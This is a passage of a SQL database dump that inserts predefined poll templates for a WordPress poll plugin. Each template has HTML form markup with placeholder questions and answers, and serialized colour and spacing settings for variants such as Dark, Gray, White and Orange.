basic-form" -->\n										</div><!-- end basic-inner -->\n									</div><!-- end col-md-12 -->\n								</div><!-- end row -->\n							</div><!-- end basic-yop-poll-container -->', 'predefined', 0, 'a:7:{s:4:"poll";a:6:{s:15:"backgroundColor";s:7:"#ffffff";s:10:"borderSize";s:3:"1px";s:11:"borderColor";s:7:"#000000";s:12:"borderRadius";s:3:"0px";s:16:"paddingLeftRight";s:4:"10px";s:16:"paddingTopBottom";s:4:"10px";}s:9:"questions";a:4:{s:9:"textColor";s:4:"#000";s:8:"textSize";s:4:"16px";s:10:"textWeight";s:6:"normal";s:9:"textAlign";s:4:"left";}s:7:"answers";a:7:{s:16:"paddingLeftRight";s:3:"0px";s:16:"paddingTopBottom";s:3:"0px";s:9:"textColor";s:4:"#000";s:8:"textSize";s:4:"14px";s:10:"textWeight";s:6:"normal";s:4:"skin";s:0:"";s:11:"colorScheme";s:0:"";}s:7:"buttons";a:9:{s:15:"backgroundColor";s:7:"#ee7600";s:10:"borderSize";s:3:"0px";s:11:"borderColor";s:4:"#000";s:12:"borderRadius";s:3:"0px";s:16:"paddingLeftRight";s:4:"10px";s:16:"paddingTopBottom";s:3:"5px";s:9:"textColor";s:4:"#fff";s:8:"textSize";s:4:"14px";s:10:"textWeight";s:6:"normal";}s:7:"captcha";a:0:{}s:6:"errors";a:7:{s:25:"borderLeftColorForSuccess";s:7:"#008000";s:23:"borderLeftColorForError";s:7:"#ff0000";s:14:"borderLeftSize";s:4:"10px";s:16:"paddingTopBottom";s:3:"0px";s:9:"textColor";s:7:"#000000";s:8:"textSize";s:2:"14";s:10:"textWeight";s:6:"normal";}s:6:"custom";a:1:{s:3:"css";s:0:"";}}', '2023-06-21 09:29:39', '0000-00-00 00:00:00'),
(2, 'basic', 'Dark V1', 'dark-v1', '', '<div class="basic-yop-poll-container dark-v1" style="padding-top: 15px;padding-bottom: 15px;">\n								<div class="row">\n									<div class="col-md-12">\n										<div class="basic-inner">\n											<form class="basic-form">\n												<div class="basic-elements">\n													<div class="basic-element basic-question basic-question-text-vertical">\n														<div class="basic-question-title">\n															<h5>Poll Question</h5>\n														</div><!-- end basic-question-title -->\n														<ul class="basic-answers">\n															<li class="basic-answer">\n																<div class="basic-answer-content basic-text-vertical">\n																	<input type="radio">    \n																	<label class="basic-text">Answer 1</label>\n																</div>\n															</li>\n															<li class="basic-answer">\n																<div class="basic-answer-content basic-text-vertical">\n																	<input type="radio">    \n																	<label class="basic-text">Answer 2</label>\n																</div>\n															</li>\n															<li class="basic-answer">\n																<div class="basic-answer-content basic-text-vertical">\n																	<input type="radio">    \n																	<label class="basic-text">Answer 3</label>\n																</div>\n															</li>\n															<li class="basic-answer">\n																<div class="basic-answer-content basic-text-vertical">\n																	<input type="radio">    \n																	<label class="basic-text">Answer 4</label>\n																</div>\n															</li>\n															<li class="basic-answer">\n																<div class="basic-answer-content basic-text-vertical">\n																	<input type="radio">    \n																	<label class="basic-text">Answer 4</label>\n																</div>\n															</li>\n														</ul><!-- end basic-answers -->\n													</div><!-- end basic-element basic-question -->\n													<div class="clearfix"></div>\n												</div><!-- end basic-elements -->\n												<div class="basic-vote">\n													<a href="#" class="button basic-vote-button">Vote</a>\n												</div><!-- end basic-vote -->\n											</form><!-- end basic-form" -->\n										</div><!-- end basic-inner -->\n									</div><!-- end col-md-12 -->\n								</div><!-- end row -->\n							</div><!-- end basic-yop-poll-container -->', 'predefined', 0, 'a:7:{s:4:"poll";a:6:{s:15:"backgroundColor";s:7:"#555555";s:10:"borderSize";s:3:"0px";s:11:"borderColor";s:7:"#555555";s:12:"borderRadius";s:3:"0px";s:16:"paddingLeftRight";s:4:"10px";s:16:"paddingTopBottom";s:4:"10px";}s:9:"questions";a:4:{s:9:"textColor";s:7:"#ffffff";s:8:"textSize";s:4:"16px";s:10:"textWeight";s:6:"normal";s:9:"textAlign";s:6:"center";}s:7:"answers";a:7:{s:16:"paddingLeftRight";s:3:"0px";s:16:"paddingTopBottom";s:3:"0px";s:9:"textColor";s:7:"#ffffff";s:8:"textSize";s:4:"14px";s:10:"textWeight";s:6:"normal";s:4:"skin";s:0:"";s:11:"colorScheme";s:0:"";}s:7:"buttons";a:9:{s:15:"backgroundColor";s:7:"#ffffff";s:10:"borderSize";s:3:"1px";s:11:"borderColor";s:4:"#000";s:12:"borderRadius";s:3:"0px";s:16:"paddingLeftRight";s:4:"10px";s:16:"paddingTopBottom";s:3:"5px";s:9:"textColor";s:4:"#000";s:8:"textSize";s:4:"14px";s:10:"textWeight";s:6:"normal";}s:7:"captcha";a:0:{}s:6:"errors";a:7:{s:25:"borderLeftColorForSuccess";s:7:"#008000";s:23:"borderLeftColorForError";s:7:"#ff0000";s:14:"borderLeftSize";s:4:"10px";s:16:"paddingTopBottom";s:3:"0px";s:9:"textColor";s:7:"#000000";s:8:"textSize";s:2:"14";s:10:"textWeight";s:6:"normal";}s:6:"custom";a:1:{s:3:"css";s:88:".basic-yop-poll-container[data-uid] .basic-vote {\n									text-align: center;\n								}";}}', '2023-06-21 09:29:39', '0000-00-00 00:00:00'),
(3, 'basic', 'Gray V1', 'gray-v1', '', '<div class="basic-yop-poll-container grey" style="padding-top: 15px;padding-bottom: 15px;">\n								<div class="row">\n									<div class="col-md-12">\n										<div class="basic-inner">\n											<form class="basic-form">\n												<div class="basic-elements">\n													<div class="basic-element basic-question basic-question-text-vertical">\n														<div class="basic-question-title">\n															<h5>Poll Question</h5>\n														</div><!-- end basic-question-title -->\n														<ul class="basic-answers">\n															<li class="basic-answer">\n																<div class="basic-answer-content basic-text-vertical">\n																	<input type="radio">    \n																	<label class="basic-text">Answer 1</label>\n																</div>\n															</li>\n															<li class="basic-answer">\n																<div class="basic-answer-content basic-text-vertical">\n																	<input type="radio">    \n																	<label class="basic-text">Answer 2</label>\n																</div>\n															</li>\n															<li class="basic-answer">\n																<div class="basic-answer-content basic-text-vertical">\n																	<input type="radio">    \n																	<label class="basic-text">nswer 3</label>\n																</div>\n															</li>\n															<li class="basic-answer">\n																<div class="basic-answer-content basic-text-vertical">\n																	<input type="radio">    \n																	<label class="basic-text">Answer 4</label>\n																</div>\n															</li>\n															<li class="basic-answer">\n																<div class="basic-answer-content basic-text-vertical">\n																	<input type="radio">    \n																	<label class="basic-text">Answer 5</label>\n																</div>\n															</li>\n														</ul><!-- end basic-answers -->\n													</div><!-- end basic-element basic-question -->\n													<div class="clearfix"></div>\n												</div><!-- end basic-elements -->\n												<div class="basic-vote">\n													<a href="#" class="button basic-vote-button">Vote</a>\n												</div><!-- end basic-vote -->\n											</form><!-- end basic-form" -->\n										</div><!-- end basic-inner -->\n									</div><!-- end col-md-12 -->\n								</div><!-- end row -->\n							</div><!-- end basic-yop-poll-container -->', 'predefined', 0, 'a:7:{s:4:"poll";a:6:{s:15:"backgroundColor";s:7:"#EEEEEE";s:10:"borderSize";s:3:"0px";s:11:"borderColor";s:7:"#EEEEEE";s:12:"borderRadius";s:3:"0px";s:16:"paddingLeftRight";s:4:"10px";s:16:"paddingTopBottom";s:4:"10px";}s:9:"questions";a:4:{s:9:"textColor";s:4:"#000";s:8:"textSize";s:4:"16px";s:10:"textWeight";s:6:"normal";s:9:"textAlign";s:6:"center";}s:7:"answers";a:7:{s:16:"paddingLeftRight";s:3:"0px";s:16:"paddingTopBottom";s:3:"0px";s:9:"textColor";s:4:"#000";s:8:"textSize";s:4:"14px";s:10:"textWeight";s:6:"normal";s:4:"skin";s:0:"";s:11:"colorScheme";s:0:"";}s:7:"buttons";a:9:{s:15:"backgroundColor";s:7:"#ffffff";s:10:"borderSize";s:3:"1px";s:11:"borderColor";s:4:"#000";s:12:"borderRadius";s:3:"0px";s:16:"paddingLeftRight";s:4:"10px";s:16:"paddingTopBottom";s:3:"5px";s:9:"textColor";s:4:"#000";s:8:"textSize";s:4:"14px";s:10:"textWeight";s:6:"normal";}s:7:"captcha";a:0:{}s:6:"errors";a:7:{s:25:"borderLeftColorForSuccess";s:7:"#008000";s:23:"borderLeftColorForError";s:7:"#ff0000";s:14:"borderLeftSize";s:4:"10px";s:16:"paddingTopBottom";s:3:"0px";s:9:"textColor";s:7:"#000000";s:8:"textSize";s:2:"14";s:10:"textWeight";s:6:"normal";}s:6:"custom";a:1:{s:3:"css";s:87:".basic-yop-poll-container[data-uid] .basic-vote {\n								text-align: center;\n								}";}}', '2023-06-21 09:29:39', '0000-00-00 00:00:00'),
(4, 'basic', 'White V1', 'white-v1', '', '<div class="basic-yop-poll-container white-v1" style="padding-top: 15px;padding-bottom: 15px;">\n								<div class="row">\n									<div class="col-md-12">\n										<div class="basic-inner">\n											<form class="basic-form">\n												<div class="basic-elements">\n													<div class="basic-element basic-question basic-question-text-vertical">\n														<div class="basic-question-title">\n															<h5>Poll Question</h5>\n														</div><!-- end basic-question-title -->\n														<ul class="basic-answers">\n															<li class="basic-answer">\n																<div class="basic-answer-content basic-text-vertical">\n																	<input type="radio">    \n																	<label class="basic-text">Answer 1</label>\n																</div>\n															</li>\n															<li class="basic-answer">\n																<div class="basic-answer-content basic-text-vertical">\n																	<input type="radio">    \n																	<label class="basic-text">Answer 2</label>\n																</div>\n															</li>\n															<li class="basic-answer">\n																<div class="basic-answer-content basic-text-vertical">\n																	<input type="radio">    \n																	<label class="basic-text">Answer 3</label>\n																</div>\n															</li>\n															<li class="basic-answer">\n																<div class="basic-answer-content basic-text-vertical">\n																	<input type="radio">    \n																	<label class="basic-text">Answer 4</label>\n																</div>\n															</li>\n															<li class="basic-answer">\n																<div class="basic-answer-content basic-text-vertical">\n																	<input type="radio">    \n																	<label class="basic-text">Answer 5</label>\n																</div>\n															</li>\n														</ul><!-- end basic-answers -->\n													</div><!-- end basic-element basic-question -->\n													<div class="clearfix"></div>\n												</div><!-- end basic-elements -->\n												<div class="basic-vote">\n													<a href="#" class="button basic-vote-button">Vote</a>\n												</div><!-- end basic-vote -->\n											</form><!-- end basic-form" -->\n										</div><!-- end basic-inner -->\n									</div><!-- end col-md-12 -->\n								</div><!-- end row -->\n							</div><!-- end basic-yop-poll-container -->', 'predefined', 0, 'a:7:{s:4:"poll";a:6:{s:15:"backgroundColor";s:7:"#ffffff";s:10:"borderSize";s:3:"0px";s:11:"borderColor";s:7:"#ffffff";s:12:"borderRadius";s:3:"0px";s:16:"paddingLeftRight";s:4:"10px";s:16:"paddingTopBottom";s:4:"10px";}s:9:"questions";a:4:{s:9:"textColor";s:4:"#000";s:8:"textSize";s:4:"16px";s:10:"textWeight";s:6:"normal";s:9:"textAlign";s:6:"center";}s:7:"answers";a:7:{s:16:"paddingLeftRight";s:3:"0px";s:16:"paddingTopBottom";s:3:"0px";s:9:"textColor";s:4:"#000";s:8:"textSize";s:4:"14px";s:10:"textWeight";s:6:"normal";s:4:"skin";s:0:"";s:11:"colorScheme";s:0:"";}s:7:"buttons";a:9:{s:15:"backgroundColor";s:7:"#ffffff";s:10:"borderSize";s:3:"1px";s:11:"borderColor";s:4:"#000";s:12:"borderRadius";s:3:"0px";s:16:"paddingLeftRight";s:4:"10px";s:16:"paddingTopBottom";s:3:"5px";s:9:"textColor";s:4:"#000";s:8:"textSize";s:4:"14px";s:10:"textWeight";s:6:"normal";}s:7:"captcha";a:0:{}s:6:"errors";a:7:{s:25:"borderLeftColorForSuccess";s:7:"#008000";s:23:"borderLeftColorForError";s:7:"#ff0000";s:14:"borderLeftSize";s:4:"10px";s:16:"paddingTopBottom";s:3:"0px";s:9:"textColor";s:7:"#000000";s:8:"textSize";s:2:"14";s:10:"textWeight";s:6:"normal";}s:6:"custom";a:1:{s:3:"css";s:89:".basic-yop-poll-container[data-uid]  .basic-vote {\n									text-align: center;\n								}";}}', '2023-06-21 09:29:39', '0000-00-00 00:00:00'),
(5, 'basic', 'Dark V2', 'dark-v2', '', '<div class="basic-yop-poll-container dark-v2" style="padding-top: 15px;padding-bottom: 15px;">\n								<div class="row">\n									<div class="col-md-12">\n										<div class="basic-inner">\n											<form class="basic-form">\n												<div class="basic-elements">\n													<div class="basic-element basic-question basic-question-text-vertical">\n														<div class="basic-question-title">\n															<h5>Poll Question</h5>\n														</div><!-- end basic-question-title -->\n														<ul class="basic-answers">\n															<li class="basic-answer">\n																<div class="basic-answer-content basic-text-vertical">\n																	<input type="radio">    \n																	<label class="basic-text">Answer 1</label>\n																</div>\n															</li>\n															<li class="basic-answer">\n																<div class="basic-answer-content basic-text-vertical">\n																	<input type="radio">    \n																	<label class="basic-text">Answer 2</label>\n																</div>\n															</li>\n															<li class="basic-answer">\n																<div class="basic-answer-content basic-text-vertical">\n																	<input type="radio">    \n																	<label class="basic-text">Answer 3</label>\n																</div>\n															</li>\n															<li class="basic-answer">\n																<div class="basic-answer-content basic-text-vertical">\n																	<input type="radio">    \n																	<label class="basic-text">Answer 4</label>\n																</div>\n															</li>\n															<li class="basic-answer">\n																<div class="basic-answer-content basic-text-vertical">\n																	<input type="radio">    \n																	<label class="basic-text">Answer 5</label>\n																</div>\n															</li>\n														</ul><!-- end basic-answers -->\n													</div><!-- end basic-element basic-question -->\n													<div class="clearfix"></div>\n												</div><!-- end basic-elements -->\n												<div class="basic-vote">\n													<a href="#" class="button basic-vote-button">Vote</a>\n												</div><!-- end basic-vote -->\n											</form><!-- end basic-form" -->\n										</div><!-- end basic-inner -->\n									</div><!-- end col-md-12 -->\n								</div><!-- end row -->\n							</div><!-- end basic-yop-poll-container -->', 'predefined', 0, 'a:7:{s:4:"poll";a:6:{s:15:"backgroundColor";s:7:"#555555";s:10:"borderSize";s:3:"0px";s:11:"borderColor";s:7:"#555555";s:12:"borderRadius";s:3:"7px";s:16:"paddingLeftRight";s:4:"10px";s:16:"paddingTopBottom";s:4:"10px";}s:9:"questions";a:4:{s:9:"textColor";s:7:"#ffffff";s:8:"textSize";s:4:"16px";s:10:"textWeight";s:6:"normal";s:9:"textAlign";s:6:"center";}s:7:"answers";a:7:{s:16:"paddingLeftRight";s:3:"0px";s:16:"paddingTopBottom";s:3:"0px";s:9:"textColor";s:7:"#ffffff";s:8:"textSize";s:4:"14px";s:10:"textWeight";s:6:"normal";s:4:"skin";s:0:"";s:11:"colorScheme";s:0:"";}s:7:"buttons";a:9:{s:15:"backgroundColor";s:7:"#ffffff";s:10:"borderSize";s:3:"1px";s:11:"borderColor";s:4:"#000";s:12:"borderRadius";s:3:"0px";s:16:"paddingLeftRight";s:4:"10px";s:16:"paddingTopBottom";s:3:"5px";s:9:"textColor";s:4:"#000";s:8:"textSize";s:4:"14px";s:10:"textWeight";s:6:"normal";}s:7:"captcha";a:0:{}s:6:"errors";a:7:{s:25:"borderLeftColorForSuccess";s:7:"#008000";s:23:"borderLeftColorForError";s:7:"#ff0000";s:14:"borderLeftSize";s:4:"10px";s:16:"paddingTopBottom";s:3:"0px";s:9:"textColor";s:7:"#000000";s:8:"textSize";s:2:"14";s:10:"textWeight";s:6:"normal";}s:6:"custom";a:1:{s:3:"css";s:88:".basic-yop-poll-container[data-uid] .basic-vote {\n									text-align: center;\n								}";}}', '2023-06-21 09:29:39', '0000-00-00 00:00:00'),
(6, 'basic', 'White V2', 'white-v2', '', '<div class="basic-yop-poll-container white-v2" style="padding-top: 14px;padding-bottom: 14px;">\n								<div class="row">\n									<div class="col-md-12">\n										<div class="basic-inner">\n											<form class="basic-form">\n												<div class="basic-elements">\n													<div class="basic-element basic-question basic-question-text-vertical">\n														<div class="basic-question-title">\n															<h5>Poll Question</h5>\n														</div><!-- end basic-question-title -->\n														<ul class="basic-answers">\n															<li class="basic-answer">\n																<div class="basic-answer-content basic-text-vertical">\n																	<input type="radio">    \n																	<label class="basic-text">Answer 1</label>\n																</div>\n															</li>\n															<li class="basic-answer">\n																<div class="basic-answer-content basic-text-vertical">\n																	<input type="radio">    \n																	<label class="basic-text">Answer 2</label>\n																</div>\n															</li>\n															<li class="basic-answer">\n																<div class="basic-answer-content basic-text-vertical">\n																	<input type="radio">    \n																	<label class="basic-text">Answer 3</label>\n																</div>\n															</li>\n															<li class="basic-answer">\n																<div class="basic-answer-content basic-text-vertical">\n																	<input type="radio">    \n																	<label class="basic-text">Answer 4</label>\n																</div>\n															</li>\n															<li class="basic-answer">\n																<div class="basic-answer-content basic-text-vertical">\n																	<input type="radio">    \n																	<label class="basic-text">Answer 5</label>\n																</div>\n															</li>\n														</ul><!-- end basic-answers -->\n													</div><!-- end basic-element basic-question -->\n													<div class="clearfix"></div>\n												</div><!-- end basic-elements -->\n												<div class="basic-vote">\n													<a href="#" class="button basic-vote-button">Vote</a>\n												</div><!-- end basic-vote -->\n											</form><!-- end basic-form" -->\n										</div><!-- end basic-inner -->\n									</div><!-- end col-md-12 -->\n								</div><!-- end row -->\n							</div><!-- end basic-yop-poll-container -->', 'predefined', 0, 'a:7:{s:4:"poll";a:6:{s:15:"backgroundColor";s:7:"#ffffff";s:10:"borderSize";s:3:"1px";s:11:"borderColor";s:7:"#000000";s:12:"borderRadius";s:3:"5px";s:16:"paddingLeftRight";s:4:"10px";s:16:"paddingTopBottom";s:4:"10px";}s:9:"questions";a:4:{s:9:"textColor";s:4:"#000";s:8:"textSize";s:4:"16px";s:10:"textWeight";s:6:"normal";s:9:"textAlign";s:6:"center";}s:7:"answers";a:7:{s:16:"paddingLeftRight";s:3:"0px";s:16:"paddingTopBottom";s:3:"0px";s:9:"textColor";s:4:"#000";s:8:"textSize";s:4:"14px";s:10:"textWeight";s:6:"normal";s:4:"skin";s:0:"";s:11:"colorScheme";s:0:"";}s:7:"buttons";a:9:{s:15:"backgroundColor";s:7:"#ffffff";s:10:"borderSize";s:3:"1px";s:11:"borderColor";s:4:"#000";s:12:"borderRadius";s:3:"0px";s:16:"paddingLeftRight";s:4:"10px";s:16:"paddingTopBottom";s:3:"5px";s:9:"textColor";s:4:"#000";s:8:"textSize";s:4:"14px";s:10:"textWeight";s:6:"normal";}s:7:"captcha";a:0:{}s:6:"errors";a:7:{s:25:"borderLeftColorForSuccess";s:7:"#008000";s:23:"borderLeftColorForError";s:7:"#ff0000";s:14:"borderLeftSize";s:4:"10px";s:16:"paddingTopBottom";s:3:"0px";s:9:"textColor";s:7:"#000000";s:8:"textSize";s:2:"14";s:10:"textWeight";s:6:"normal";}s:6:"custom";a:1:{s:3:"css";s:88:".basic-yop-poll-container[data-uid] .basic-vote {\n									text-align: center;\n								}";}}', '2023-06-21 09:29:39', '0000-00-00 00:00:00'),
(7, 'basic', 'Orange V1', 'orange-v1', '', '<div class="basic-yop-poll-container orange-v1" style="padding-top: 15px;padding-bottom: 15px;">\n								<div class="row">\n									<div class="col-md-12">\n										<div class="basic-inner">\n											<form class="basic-form">\n												<div class="basic-elements">\n													<div class="basic-element basic-question basic-question-text-vertical">\n														<div class="basic-question-title">\n															<h5>Poll Question</h5>\n														</div><!-- end basic-question-title -->\n														<ul class="basic-answers">\n															<li class="basic-answer">\n																<div class="basic-answer-content basic-text-vertical">\n																	<input type="radio">    \n																	<label class="basic-text">Answer 1</label>\n																</div>\n															</li>\n															<li class="basic-answer">\n																<div class="basic-answer-content basic-text-vertical">\n																	<input type="radio">    \n																	<label class="basic-text">Answer 2</label>\n																</div>\n															</li>\n															<li class="basic-answer">\n																<div class="basic-answer-content basic-text-vertical">\n																	<input type="radio">    \n																	<label class="basic-text">Answer 3</label>\n																</div>\n															</li>\n															<li class="basic-answer">\n																<div class="basic-answer-content basic-text-vertical">\n																	<input type="radio">    \n																	<label class="basic-text">Answer 4</label>\n																</div>\n															</li>\n															<li class="basic-answer">\n																<div class="basic-answer-content basic-text-vertical">\n																	<input type="radio">    \n																	<label class="basic-text">Answer 5</label>\n																</div>\n															</li>\n														</ul><!-- end basic-answers -->\n													</div><!-- end basic-element basic-question -->\n													<div class="clearfix"></div>\n												</div><!-- end basic-elements -->\n												<div class="basic-vote">\n													<a href="#" class="button basic-vote-button">Vote</a>\n												</div><!-- end basic-vote -->\n											</form><!-- end basic-form" -->\n										</div><!-- end basic-inner -->\n									</div><!-- end col-md-12 -->\n								</div><!-- end row -->\n							</div><!-- end basic-yop-poll-container -->', 'predefined', 0, 'a:7:{s:4:"poll";a:6:{s:15:"backgroundColor";s:7:"#FB6911";s:10:"borderSize";s:3:"0px";s:11:"borderColor";s:7:"#FB6911";s:12:"borderRadius";s:3:"0px";s:16:"paddingLeftRight";s:4:"10px";s:16:"paddingTopBottom";s:4:"10px";}s:9:"questions";a:4:{s:9:"textColor";s:7:"#ffffff";s:8:"textSize";s:4:"16px";s:10:"textWeight";s:6:"normal";s:9:"textAlign";s:6:"center";}s:7:"answers";a:7:{s:16:"paddingLeftRight";s:3:"0px";s:16:"paddingTopBottom";s:3:"0px";s:9:"textColor";s:7:"#ffffff";s:8:"textSize";s:4:"14px";s:10:"textWeight";s:6:"normal";s:4:"skin";s:0:"";s:11:"colorScheme";s:0:"";}s:7:"buttons";a:9:{s:15:"backgroundColor";s:7:"#ffffff";s:10:"borderSize";s:3:"1px";s:11:"borderColor";s:4:"#000";s:12:"borderRadius";s:3:"0px";s:16:"paddingLeftRight";s:4:"10px";s:16:"paddingTopBottom";s:3:"5px";s:9:"textColor";s:4:"#000";s:8:"textSize";s:4:"14px";s:10:"textWeight";s:6:"normal";}s:7:"captcha";a:0:{}s:6:"errors";a:7:{s:25:"borderLeftColorForSuccess";s:7:"#008000";s:23:"borderLeftColorForError";s:7:"#ff0000";s:14:"borderLeftSize";s:4:"10px";s:16:"paddingTopBottom";s:3:"0px";s:9:"textColor";s:7:"#000000";s:8:"textSize";s:2:"14";s:10:"textWeight";s:6:"normal";}s:6:"custom";a:1:{s:3:"css";s:88:".basic-yop-poll-container[data-uid] .basic-vote {\n									text-align: center;\n								}";}}', '2023-06-21 09:29:39', '0000-00-00 00:00:00'),
(8, 'basic', 'Orange V2', 'orange-v2', '', '<div class="basic-yop-poll-container orange-v2">\n								<div class="row">\n									<div class="col-md-12">\n										<div class="basic-inner">\n											<form class="basic-form">\n												<div class="basic-elements">\n													<div class="basic-element basic-question basic-question-text-vertical">\n														<div class="basic-question-title">\n															<h5>Poll Question</h5>\n														</div><!-- end basic-question-title -->\n														<ul class="basic-answers">\n															<li class="basic-answer">\n																<div class="basic-answer-content basic-text-vertical">\n																	<input type="radio">    \n																	<label class="basic-text">Answer 1</label>\n																</div>\n															</li>\n															<li class="basic-answer">\n																<div class="basic-answer-content basic-text-vertical">\n																	<input type="radio">    \n																	<label class="basic-text">Answer 2</label>\n																</div>\n															</li>\n															<li class="basic-answer">\n																<div class="basic-answer-content basic-text-vertical">\n																	<input type="radio">    \n																	<label class="basic-text">Answer 3</label>\n																</div>\n															</li>\n															<li class="basic-answer">\n																<div class="basic-answer-content basic-text-vertical">\n																	<input type="radio">    \n																	<label class="basic-text">Answer 4</label>\n																</div>\n															</li>\n															<li class="basic-answer">\n																<div class="basic-answer-content basic-text-vertical">\n																	<input type="radio">    \n																	<label class="basic-text">Answer 5</label>\n																</div>\n															</li>\n														</ul><!-- end basic-answers -->\n													</div><!-- end basic-element basic-question -->\n													<div class="clearfix"></div>\n												</div><!-- end basic-elements -->\n												<div class="basic-vote">\n													<a href="#" class="button basic-vote-button">Vote</a>\n												</div><!-- end basic-vote -->\n											</form><!-- end basic-form" -->\n										</div><!-- end basic-inner -->\n									</div><!-- end col-md-12 -->\n								</div><!-- end row -->\n							</div><!-- end basic-yop-poll-container -->', 'predefined', 0, 'a:7:{s:4:"poll";a:6:{s:15:"backgroundColor";s:7:"#ffffff";s:10:"borderSize";s:3:"0px";s:11:"borderColor";s:7:"#ffffff";s:12:"borderRadius";s:3:"0px";s:16:"paddingLeftRight";s:4:"10px";s:16:"paddingTopBottom";s:4:"10px";}s:9:"questions";a:4:{s:9:"textColor";s:7:"#ffffff";s:8:"textSize";s:4:"16px";s:10:"textWeight";s:6:"normal";s:9:"textAlign";s:6:"center";}s:7:"answers";a:7:{s:16:"paddingLeftRight";s:3:"0px";s:16:"paddingTopBottom";s:3:"0px";s:9:"textColor";s:4:"#000";s:8:"textSize";s:4:"14px";s:10:"textWeight";s:6:"normal";s:4:"skin";s:0:"";s:11:"colorScheme";s:0:"";}s:7:"buttons";a:9:{s:15:"backgroundColor";s:7:"#ffffff";s:10:"borderSize";s:3:"1px";s:11:"borderColor";s:4:"#000";s:12:"borderRadius";s:3:"0px";s:16:"paddingLeftRight";s:4:"10px";s:16:"paddingTopBottom";s:3:"5px";s:9:"textColor";s:4:"#000";s:8:"textSize";s:4:"14px";s:10:"textWeight";s:6:"normal";}s:7:"captcha";a:0:{}s:6:"errors";a:7:{s:25:"borderLeftColorForSuccess";s:7:"#008000";s:23:"borderLeftColorForError";s:7:"#ff0000";s:14:"borderLeftSize";s:4:"10px";s:16:"paddingTopBottom";s:3:"0px";s:9:"textColor";s:7:"#000000";s:8:"textSize";s:2:"14";s:10:"textWeight";s:6:"normal";}s:6:"custom";a:1:{s:3:"css";s:230:".basic-yop-poll-container[data-uid] .basic-vote {\n									text-align: center;\n								}\n								.basic-yop-poll-container[data-uid] .basic-question-title h5 {\n									background-color: #FB6911;\n									padding: 5px 0;\n								}";}}', '2023-06-21 09:29:39', '0000-00-00 00:00:00'),
(9, 'basic', 'Orange V3', 'orange-v3', '', '<div class="basic-yop-poll-container orange-v3" style="padding-top: 12px;padding-bottom: 12px;">\n								<div class="row">\n									<div class="col-md-12">\n										<div class="basic-inner">\n											<form class="basic-form">\n												<div class="basic-elements">\n													<div class="basic-element basic-question basic-question-text-vertical">\n														<div class="basic-question-title">\n															<h5>Poll Question</h5>\n														</div><!-- end basic-question-title -->\n														<ul class="basic-answers">\n															<li class="basic-answer">\n																<div class="basic-answer-content basic-text-vertical">\n																	<input type="radio">    \n																	<label class="basic-text">Answer 1</label>\n																</div>\n															</li>\n															<li class="basic-answer">\n																<div class="basic-answer-content basic-text-vertical">\n																	<input type="radio">    \n																	<label class="basic-text">Answer 2</label>\n																</div>\n															</li>\n															<li class="basic-answer">\n																<div class="basic-answer-content basic-text-vertical">\n																	<input type="radio">    \n																	<label class="basic-text">Answer 3</label>\n																</div>\n															</li>\n															<li class="basic-answer">\n																<div class="basic-answer-content basic-text-vertical">\n																	<input type="radio">    \n																	<label class="basic-text">Answer 4</label>\n																</div>\n															</li>\n															<li class="basic-answer">\n																<div class="basic-answer-content basic-text-vertical">\n																	<input type="radio">    \n																	<label class="basic-text">Answer 5</label>\n																</div>\n															</li>\n														</ul><!-- end basic-answers -->\n													</div><!-- end basic-element basic-question -->\n													<div class="clearfix"></div>\n												</div><!-- end basic-elements -->\n												<div class="basic-vote">\n													<a href="#" class="button basic-vote-button">Vote</a>\n												</div><!-- end basic-vote -->\n											</form><!-- end basic-form" -->\n										</div><!-- end basic-inner -->\n									</div><!-- end col-md-12 -->\n								</div><!-- end row -->\n							</div><!-- end basic-yop-poll-container -->', 'predefined', 0, 'a:7:{s:4:"poll";a:6:{s:15:"backgroundColor";s:7:"#ffffff";s:10:"borderSize";s:3:"1px";s:11:"borderColor";s:7:"#FB6911";s:12:"borderRadius";s:3:"0px";s:16:"paddingLeftRight";s:4:"10px";s:16:"paddingTopBottom";s:4:"10px";}s:9:"questions";a:4:{s:9:"textColor";s:4:"#000";s:8:"textSize";s:4:"16px";s:10:"textWeight";s:6:"normal";s:9:"textAlign";s:6:"center";}s:7:"answers";a:7:{s:16:"paddingLeftRight";s:3:"0px";s:16:"paddingTopBottom";s:3:"0px";s:9:"textColor";s:4:"#000";s:8:"textSize";s:4:"14px";s:10:"textWeight";s:6:"normal";s:4:"skin";s:0:"";s:11:"colorScheme";s:0:"";}s:7:"buttons";a:9:{s:15:"backgroundColor";s:7:"#ffffff";s:10:"borderSize";s:3:"1px";s:11:"borderColor";s:4:"#000";s:12:"borderRadius";s:3:"0px";s:16:"paddingLeftRight";s:4:"10px";s:16:"paddingTopBottom";s:3:"5px";s:9:"textColor";s:6:"#55555";s:8:"textSize";s:4:"14px";s:10:"textWeight";s:6:"normal";}s:7:"captcha";a:0:{}s:6:"errors";a:7:{s:25:"borderLeftColorForSuccess";s:7:"#008000";s:23:"borderLeftColorForError";s:7:"#ff0000";s:14:"borderLeftSize";s:4:"10px";s:16:"paddingTopBottom";s:3:"0px";s:9:"textColor";s:7:"#000000";s:8:"textSize";s:2:"14";s:10:"textWeight";s:6:"normal";}s:6:"custom";a:1:{s:3:"css";s:88:".basic-yop-poll-container[data-uid] .basic-vote {\n									text-align: center;\n								}";}}', '2023-06-21 09:29:39', '0000-00-00 00:00:00'),
(10, 'basic', 'Orange V4', 'orange-v4', '', '<div class="basic-yop-poll-container orange-v4" style="padding-top: 12px;padding-bottom: 12px;">\n								<div class="row">\n									<div class="col-md-12">\n										<div class="basic-inner">\n											<form class="basic-form">\n												<div class="basic-elements">\n													<div class="basic-element basic-question basic-question-text-vertical">\n														<div class="basic-question-title">\n															<h5>Poll Question</h5>\n														</div><!-- end basic-question-title -->\n														<ul class="basic-answers">\n															<li class="basic-answer">\n																<div class="basic-answer-content basic-text-vertical">\n																	<input type="radio">    \n																	<label class="basic-text">Answer 1</label>\n																</div>\n															</li>\n															<li class="basic-answer">\n																<div class="basic-answer-content basic-text-vertical">\n																	<input type="radio">    \n																	<label class="basic-text">Answer 2</label>\n																</div>\n															</li>\n															<li class="basic-answer">\n																<div class="basic-answer-content basic-text-vertical">\n																	<input type="radio">    \n																	<label class="basic-text">Answer 3</label>\n																</div>\n															</li>\n															<li class="basic-answer">\n																<div class="basic-answer-content basic-text-vertical">\n																	<input type="radio">    \n																	<label class="basic-text">Answer 4</label>\n																</div>\n															</li>\n															<li class="basic-answer">\n																<div class="basic-answer-content basic-text-vertical">\n																	<input type="radio">    \n																	<label class="basic-text">Answer 5</label>\n																</div>\n															</li>\n														</ul><!-- end basic-answers -->\n													</div><!-- end basic-element 